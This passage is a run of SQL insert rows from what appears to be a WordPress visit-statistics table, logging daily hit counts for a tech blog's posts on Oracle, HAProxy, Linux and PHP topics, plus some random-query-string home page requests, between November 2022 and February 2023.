(3450,'/impdp-errors-ora-02374-ora-12899/','post','2022-11-30',4,56),
(3451,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-11-30',1,312),
(3452,'/index.php/about-me/','page','2022-11-30',3,51),
(3453,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-11-30',1,97),
(3454,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-11-30',1,56),
(3455,'/sudo-without-password/','post','2022-11-30',1,603),
(3456,'/','home','2022-12-01',32,365),
(3457,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-01',4,56),
(3458,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-12-01',1,60),
(3459,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-01',2,583),
(3460,'/','home','2022-12-02',40,365),
(3461,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-02',3,56),
(3462,'/about-me/','page','2022-12-02',1,51),
(3463,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-02',3,583),
(3464,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-03',4,56),
(3465,'/','home','2022-12-03',67,365),
(3466,'/about-me/','page','2022-12-03',2,51),
(3467,'/setup-high-availability-for-haproxy/','post','2022-12-03',6,615),
(3468,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-12-03',1,104),
(3469,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-03',4,583),
(3470,'/','home','2022-12-04',57,365),
(3471,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2022-12-04',1,104),
(3472,'/setup-high-availability-for-haproxy/','post','2022-12-04',3,615),
(3473,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-04',5,56),
(3474,'/','home','2022-12-05',48,365),
(3475,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-05',5,56),
(3476,'/backup-restore-progress/','post','2022-12-05',1,64),
(3477,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-12-05',1,66),
(3478,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-05',1,583),
(3479,'/how-to-make-apache-web-server-more-secure/','post','2022-12-05',1,305),
(3480,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-12-05',1,150),
(3481,'/','home','2022-12-06',30,365),
(3482,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-06',4,56),
(3483,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-06',4,583),
(3484,'/about-me/','page','2022-12-06',1,51),
(3485,'/','home','2022-12-07',43,365),
(3486,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-07',4,56),
(3487,'/setup-high-availability-for-haproxy/','post','2022-12-07',2,615),
(3488,'/about-me/','page','2022-12-07',1,51),
(3489,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-07',1,583),
(3490,'/','home','2022-12-08',46,365),
(3491,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-08',3,56),
(3492,'/about-me/','page','2022-12-08',1,51),
(3493,'/hosting-a-podcast/','post','2022-12-08',1,329),
(3494,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2022-12-08',1,97),
(3495,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-08',1,583),
(3496,'/','home','2022-12-09',45,365),
(3497,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-09',4,56),
(3498,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-09',1,583),
(3499,'/change-the-character-set-collation-of-a-table/','post','2022-12-09',1,68),
(3500,'/hosting-a-podcast/','post','2022-12-09',1,329),
(3501,'/about-me/','page','2022-12-09',1,51),
(3502,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2022-12-09',1,97),
(3503,'/','home','2022-12-10',44,365),
(3504,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-10',2,583),
(3505,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-10',6,56),
(3506,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2022-12-10',1,312),
(3507,'/hosting-a-podcast/feed/','feed','2022-12-10',1,329),
(3508,'/','home','2022-12-11',98,365),
(3509,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-11',4,56),
(3510,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-12-11',2,104),
(3511,'/about-me/','page','2022-12-11',3,51),
(3512,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-11',1,583),
(3513,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-12',5,56),
(3514,'/','home','2022-12-12',33,365),
(3515,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-12',3,583),
(3516,'/','home','2022-12-13',136,365),
(3517,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-13',4,56),
(3518,'/about-me/','page','2022-12-13',1,51),
(3519,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-13',3,583),
(3520,'/','home','2022-12-14',79,365),
(3521,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-14',6,56),
(3522,'/about-me/','page','2022-12-14',1,51),
(3523,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-14',4,583),
(3524,'/','home','2022-12-15',40,365),
(3525,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-15',5,56),
(3526,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-15',3,583),
(3527,'/about-me/','page','2022-12-15',1,51),
(3528,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-16',5,56),
(3529,'/','home','2022-12-16',37,365),
(3530,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-16',2,583),
(3531,'/about-me/','page','2022-12-16',1,51),
(3532,'/','home','2022-12-17',28,365),
(3533,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-17',3,56),
(3534,'/about-me/','page','2022-12-17',1,51),
(3535,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-12-17',1,60),
(3536,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-17',2,583),
(3537,'/connection-encryption-in-oracle-database/','post','2022-12-17',1,110),
(3538,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-18',4,56),
(3539,'/','home','2022-12-18',42,365),
(3540,'/about-me/','page','2022-12-18',6,51),
(3541,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-18',1,583),
(3542,'/','home','2022-12-19',23,365),
(3543,'/about-me/','page','2022-12-19',1,51),
(3544,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-19',4,56),
(3545,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-19',1,583),
(3546,'/','home','2022-12-20',36,365),
(3547,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-20',1,583),
(3548,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-20',6,56),
(3549,'/about-me/','page','2022-12-20',1,51),
(3550,'/','home','2022-12-21',55,365),
(3551,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-21',5,56),
(3552,'/','home','2022-12-22',33,365),
(3553,'/about-me/','page','2022-12-22',5,51),
(3554,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-22',6,56),
(3555,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-22',1,583),
(3556,'/','home','2022-12-23',45,365),
(3557,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-23',4,56),
(3558,'/','home','2022-12-24',35,365),
(3559,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-24',5,56),
(3560,'/about-me/','page','2022-12-24',1,51),
(3561,'/','home','2022-12-25',31,365),
(3562,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-12-25',4,27),
(3563,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-25',4,56),
(3564,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-25',1,583),
(3565,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-26',5,56),
(3566,'/','home','2022-12-26',49,365),
(3567,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-26',1,583),
(3568,'/about-me/','page','2022-12-26',3,51),
(3569,'/','home','2022-12-27',32,365),
(3570,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-27',3,56),
(3571,'/about-me/','page','2022-12-27',1,51),
(3572,'/','home','2022-12-28',51,365),
(3573,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-28',5,56),
(3574,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-28',4,583),
(3575,'/connection-encryption-in-oracle-database/','post','2022-12-28',2,110),
(3576,'/about-me/','page','2022-12-28',1,51),
(3577,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-29',6,56),
(3578,'/','home','2022-12-29',46,365),
(3579,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-12-29',2,104),
(3580,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-12-29',2,583),
(3581,'/about-me/','page','2022-12-29',1,51),
(3582,'/','home','2022-12-30',60,365),
(3583,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-30',4,56),
(3584,'/','home','2022-12-31',34,365),
(3585,'/impdp-errors-ora-02374-ora-12899/','post','2022-12-31',7,56),
(3586,'/','home','2023-01-01',49,365),
(3587,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-01',5,56),
(3588,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-01',1,583),
(3589,'/','home','2023-01-02',34,365),
(3590,'/about-me/','page','2023-01-02',1,51),
(3591,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-02',4,56),
(3592,'/how-to-make-apache-web-server-more-secure/','post','2023-01-02',1,305),
(3593,'/','home','2023-01-03',37,365),
(3594,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-03',5,56),
(3595,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-03',3,583),
(3596,'/','home','2023-01-04',47,365),
(3597,'/about-me/','page','2023-01-04',5,51),
(3598,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-04',13,583),
(3599,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-04',4,56),
(3600,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-01-04',1,60),
(3601,'/connection-encryption-in-oracle-database/','post','2023-01-04',1,110),
(3602,'/','home','2023-01-05',46,365),
(3603,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-05',4,56),
(3604,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-05',2,583),
(3605,'/','home','2023-01-06',33,365),
(3606,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-06',5,56),
(3607,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-06',1,583),
(3608,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-07',5,56),
(3609,'/','home','2023-01-07',35,365),
(3610,'/about-me/','page','2023-01-07',1,51),
(3611,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-07',1,583),
(3612,'/','home','2023-01-08',47,365),
(3613,'/about-me/','page','2023-01-08',4,51),
(3614,'/setup-high-availability-for-haproxy/','post','2023-01-08',2,615),
(3615,'/sudo-without-password/','post','2023-01-08',2,603),
(3616,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-01-08',2,312),
(3617,'/','home','2023-01-09',41,365),
(3618,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-09',2,583),
(3619,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-09',4,56),
(3620,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2023-01-09',1,56),
(3621,'/about-me/','page','2023-01-09',1,51),
(3622,'/','home','2023-01-10',40,365),
(3623,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-10',2,583),
(3624,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-10',3,56),
(3625,'/','home','2023-01-11',65,365),
(3626,'/index.php/about-me/','page','2023-01-11',1,51),
(3627,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-11',5,56),
(3628,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2023-01-11',1,66),
(3629,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-11',1,583),
(3630,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-12',2,583),
(3631,'/','home','2023-01-12',44,365),
(3632,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-12',4,56),
(3633,'/about-me/','page','2023-01-12',1,51),
(3634,'/','home','2023-01-13',68,365),
(3635,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-13',6,56),
(3636,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-13',2,583),
(3637,'/setup-high-availability-for-haproxy/','post','2023-01-13',1,615),
(3638,'/sudo-without-password/','post','2023-01-13',1,603),
(3639,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-01-13',1,97),
(3641,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-01-14',1,104),
(3642,'/','home','2023-01-14',35,365),
(3643,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-14',5,56),
(3644,'/','home','2023-01-15',24,365),
(3645,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-15',6,56),
(3646,'/index.php?ece039=7051','home','2023-01-15',1,365),
(3647,'/?9e0c8b=57442','home','2023-01-15',1,365),
(3648,'/index.php?ff67ea=21672','home','2023-01-15',1,365),
(3649,'/?9fd49c=43086','home','2023-01-15',1,365),
(3650,'/','home','2023-01-16',18,365),
(3651,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-16',2,583),
(3652,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-01-16',2,583),
(3653,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-16',4,56),
(3654,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-01-16',1,104),
(3655,'/index.php?2b52b4=78690','home','2023-01-16',1,365),
(3656,'/?86bae7=32974','home','2023-01-16',1,365),
(3657,'/index.php?36124f=83438','home','2023-01-16',1,365),
(3658,'/?a8c3ee=60388','home','2023-01-16',1,365),
(3659,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-17',4,583),
(3660,'/','home','2023-01-17',34,365),
(3661,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-17',6,56),
(3662,'/about-me/','page','2023-01-17',2,51),
(3663,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-01-17',1,60),
(3664,'/connection-encryption-in-oracle-database/','post','2023-01-17',1,110),
(3665,'/index.php?b1c2ea=40469','home','2023-01-17',1,365),
(3666,'/?af2446=55905','home','2023-01-17',1,365),
(3667,'/index.php?de5cfb=11577','home','2023-01-17',1,365),
(3668,'/?c55ffa=88152','home','2023-01-17',1,365),
(3669,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-18',6,56),
(3670,'/','home','2023-01-18',26,365),
(3671,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-18',2,583),
(3672,'/index.php?028cf8=91706','home','2023-01-18',1,365),
(3673,'/?c49725=12347','home','2023-01-18',1,365),
(3674,'/index.php?44bf78=29675','home','2023-01-18',1,365),
(3675,'/?a59703=62056','home','2023-01-18',1,365),
(3676,'/','home','2023-01-19',59,365),
(3677,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-19',6,56),
(3678,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-01-19',1,60),
(3679,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-19',1,583),
(3680,'/index.php?6d6c08=33571','home','2023-01-19',1,365),
(3681,'/?532a51=92146','home','2023-01-19',1,365),
(3682,'/index.php?5d2173=79195','home','2023-01-19',1,365),
(3683,'/?1976f8=7985','home','2023-01-19',1,365),
(3684,'/','home','2023-01-20',38,365),
(3685,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-01-20',1,60),
(3686,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-20',7,56),
(3687,'/about-me/','page','2023-01-20',2,51),
(3688,'/index.php?e692ba=85877','home','2023-01-20',1,365),
(3689,'/?df07f4=24593','home','2023-01-20',1,365),
(3690,'/index.php?c11242=31190','home','2023-01-20',1,365),
(3691,'/?9ef957=18758','home','2023-01-20',1,365),
(3692,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-21',5,56),
(3693,'/','home','2023-01-21',43,365),
(3694,'/index.php?c091bf=80133','home','2023-01-21',1,365),
(3695,'/?49db05=86069','home','2023-01-21',1,365),
(3696,'/index.php?aae5e3=74515','home','2023-01-21',1,365),
(3697,'/?ae7d40=2234','home','2023-01-21',1,365),
(3698,'/','home','2023-01-22',44,365),
(3699,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-22',5,56),
(3700,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-22',1,583),
(3701,'/about-me/','page','2023-01-22',1,51),
(3702,'/index.php?92557f=87264','home','2023-01-22',1,365),
(3703,'/?a78459=61773','home','2023-01-22',1,365),
(3704,'/index.php?9a7fb0=90577','home','2023-01-22',1,365),
(3705,'/?ac0bb7=13934','home','2023-01-22',1,365),
(3706,'/','home','2023-01-23',25,365),
(3707,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-23',10,56),
(3708,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-23',4,583),
(3709,'/index.php?537fc7=99449','home','2023-01-23',1,365),
(3710,'/?5f5ef5=16235','home','2023-01-23',1,365),
(3711,'/index.php?263b4d=74859','home','2023-01-23',1,365),
(3712,'/?8a3905=80720','home','2023-01-23',1,365),
(3713,'/','home','2023-01-24',44,365),
(3714,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-24',5,56),
(3715,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-24',4,583),
(3716,'/index.php?b505b9=19699','home','2023-01-24',1,365),
(3717,'/?374cf0=91154','home','2023-01-24',1,365),
(3718,'/index.php?bae026=43815','home','2023-01-24',1,365),
(3719,'/?f67c82=12594','home','2023-01-24',1,365),
(3720,'/about-me/','page','2023-01-24',1,51),
(3721,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-01-24',1,60),
(3722,'/connection-encryption-in-oracle-database/','post','2023-01-24',1,110),
(3723,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-25',5,56),
(3724,'/','home','2023-01-25',42,365),
(3725,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-25',4,583),
(3726,'/about-me/','page','2023-01-25',1,51),
(3727,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-01-25',1,60),
(3728,'/connection-encryption-in-oracle-database/','post','2023-01-25',1,110),
(3729,'/index.php?59fe86=74809','home','2023-01-25',1,365),
(3730,'/?40af8a=78620','home','2023-01-25',1,365),
(3731,'/index.php?c464c1=49791','home','2023-01-25',1,365),
(3732,'/?a6d927=54754','home','2023-01-25',1,365),
(3733,'/','home','2023-01-26',32,365),
(3734,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-26',7,56),
(3735,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-26',3,583),
(3736,'/index.php?7e52af=40384','home','2023-01-26',1,365),
(3737,'/?385c19=27254','home','2023-01-26',1,365),
(3738,'/index.php?4d1a35=79765','home','2023-01-26',1,365),
(3739,'/?01e3d9=65474','home','2023-01-26',1,365),
(3740,'/','home','2023-01-27',66,365),
(3741,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-27',5,56),
(3742,'/about-me/','page','2023-01-27',1,51),
(3743,'/index.php?f11010=2537','home','2023-01-27',1,365),
(3744,'/?7c91d8=9778','home','2023-01-27',1,365),
(3745,'/index.php?98cb7e=73775','home','2023-01-27',1,365),
(3746,'/?1a47af=65190','home','2023-01-27',1,365),
(3747,'/','home','2023-01-28',41,365),
(3748,'/about-me/','page','2023-01-28',3,51),
(3749,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-28',5,56),
(3750,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-28',2,583),
(3751,'/index.php?74cc04=28777','home','2023-01-28',1,365),
(3752,'/?5a3f0d=6910','home','2023-01-28',1,365),
(3753,'/index.php?7eecc6=76973','home','2023-01-28',1,365),
(3754,'/?4c1a7d=22518','home','2023-01-28',1,365),
(3755,'/about-me/','page','2023-01-29',1,51),
(3756,'/','home','2023-01-29',30,365),
(3757,'/how-to-make-apache-web-server-more-secure/','post','2023-01-29',1,305),
(3758,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-01-29',1,150),
(3759,'/connection-encryption-in-oracle-database/','post','2023-01-29',2,110),
(3760,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-01-29',1,104),
(3761,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2023-01-29',1,27),
(3762,'/sudo-without-password/','post','2023-01-29',1,603),
(3763,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-29',4,583),
(3764,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-29',6,56),
(3765,'/index.php?7456bc=31092','home','2023-01-29',1,365),
(3766,'/?98882a=20176','home','2023-01-29',1,365),
(3767,'/index.php?b2dbd5=59924','home','2023-01-29',1,365),
(3768,'/?c34b45=63003','home','2023-01-29',1,365),
(3769,'/','home','2023-01-30',37,365),
(3770,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-30',5,56),
(3771,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-30',5,583),
(3772,'/index.php?a64f16=81821','home','2023-01-30',1,365),
(3773,'/?11f9b3=30403','home','2023-01-30',1,365),
(3774,'/index.php?6cad0e=66004','home','2023-01-30',1,365),
(3775,'/?d5b81d=65278','home','2023-01-30',1,365),
(3776,'/','home','2023-01-31',60,365),
(3777,'/impdp-errors-ora-02374-ora-12899/','post','2023-01-31',5,56),
(3778,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-01-31',2,583),
(3779,'/index.php?e15dea=3359','home','2023-01-31',1,365),
(3780,'/?ec7df1=61337','home','2023-01-31',1,365),
(3781,'/index.php?420c9b=4165','home','2023-01-31',1,365),
(3782,'/?bc77e3=32185','home','2023-01-31',1,365),
(3783,'/','home','2023-02-01',60,365),
(3784,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-01',4,56),
(3785,'/index.php?cd6059=72151','home','2023-02-01',1,365),
(3786,'/?b55b7a=4166','home','2023-02-01',1,365),
(3787,'/index.php?7787d0=60830','home','2023-02-01',1,365),
(3788,'/?6d4a23=43258','home','2023-02-01',1,365),
(3789,'/','home','2023-02-02',93,365),
(3790,'/about-me/','page','2023-02-02',4,51),
(3791,'/impdp-errors-ora-02374-ora-12899','post','2023-02-02',1,56),
(3792,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-02',5,56),
(3793,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-02-02',3,312),
(3794,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-02',1,583),
(3795,'/setup-high-availability-for-haproxy/','post','2023-02-02',1,615),
(3796,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-02-02',2,97),
(3797,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2023-02-02',2,56),
(3798,'/index.php?c77c24=80709','home','2023-02-02',1,365),
(3799,'/?010f7b=51554','home','2023-02-02',1,365),
(3800,'/index.php?7a88dc=4697','home','2023-02-02',1,365),
(3801,'/?16dfd9=56464','home','2023-02-02',1,365),
(3802,'/','home','2023-02-03',49,365),
(3803,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-03',7,56),
(3804,'/about-me/','page','2023-02-03',2,51),
(3805,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-02-03',1,60),
(3806,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-03',3,583),
(3807,'/connection-encryption-in-oracle-database/','post','2023-02-03',1,110),
(3808,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-02-03',1,97),
(3809,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2023-02-03',1,56),
(3810,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-02-03',1,583),
(3811,'/index.php?b16a84=61522','home','2023-02-03',1,365),
(3812,'/?2d6e44=24828','home','2023-02-03',1,365),
(3813,'/index.php?bdacae=3549','home','2023-02-03',1,365),
(3814,'/?226711=2462','home','2023-02-03',1,365),
(3815,'/','home','2023-02-04',36,365),
(3816,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-04',3,56),
(3817,'/index.php?68f99b=74498','home','2023-02-04',1,365),
(3818,'/?f3f738=26386','home','2023-02-04',1,365),
(3819,'/index.php?18a0e1=83373','home','2023-02-04',1,365),
(3820,'/?f258c3=77553','home','2023-02-04',1,365),
(3821,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-05',6,56),
(3822,'/','home','2023-02-05',33,365),
(3823,'/index.php?1c7f66=16197','home','2023-02-05',1,365),
(3824,'/?f35d65=42540','home','2023-02-05',1,365),
(3825,'/index.php?235722=73907','home','2023-02-05',1,365),
(3826,'/?fd2178=40105','home','2023-02-05',1,365),
(3827,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-05',1,583),
(3828,'/','home','2023-02-06',31,365),
(3829,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-06',6,56),
(3830,'/about-me/','page','2023-02-06',1,51),
(3831,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-02-06',1,60),
(3832,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-06',3,583),
(3833,'/connection-encryption-in-oracle-database/','post','2023-02-06',1,110),
(3834,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-02-06',1,583),
(3835,'/index.php?31f232=20756','home','2023-02-06',1,365),
(3836,'/?1e4e56=8962','home','2023-02-06',1,365),
(3837,'/index.php?39f0ab=44589','home','2023-02-06',1,365),
(3838,'/?f0604d=77849','home','2023-02-06',1,365),
(3839,'/','home','2023-02-07',49,365),
(3840,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-02-07',1,60),
(3841,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-07',6,56),
(3842,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-07',1,583),
(3843,'/index.php?735cae=75227','home','2023-02-07',1,365),
(3844,'/?703721=24453','home','2023-02-07',1,365),
(3845,'/index.php?ce3774=82737','home','2023-02-07',1,365),
(3846,'/?c2dac8=76723','home','2023-02-07',1,365),
(3847,'/','home','2023-02-08',24,365),
(3848,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-08',5,56),
(3849,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-08',2,583),
(3850,'/index.php?e41a0e=52391','home','2023-02-08',1,365),
(3851,'/?43c513=36285','home','2023-02-08',1,365),
(3852,'/index.php?6dd9f3=8098','home','2023-02-08',1,365),
(3853,'/?88eed9=29452','home','2023-02-08',1,365),
(3854,'/impdp-errors-ora-02374-ora-12899/','post','2023-02-09',4,56),
(3855,'/','home','2023-02-09',37,365),
(3856,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-02-09',1,583),
(3857,'/about-me/','page','2023-02-09',1,51),
(3858,'/index.php?28b02c=60898','home','2023-02-09',1,365),
(3859,'/?ec6051=45944','home','2023-02-09',1,365),
(3860,'/index.php?418ec0=9544','home','2023-02-09',1,365),
(3861,'/?732d69=37822','home','2023-02-09',1,365),
(3862,'/','home','2023-02-10',60,365),
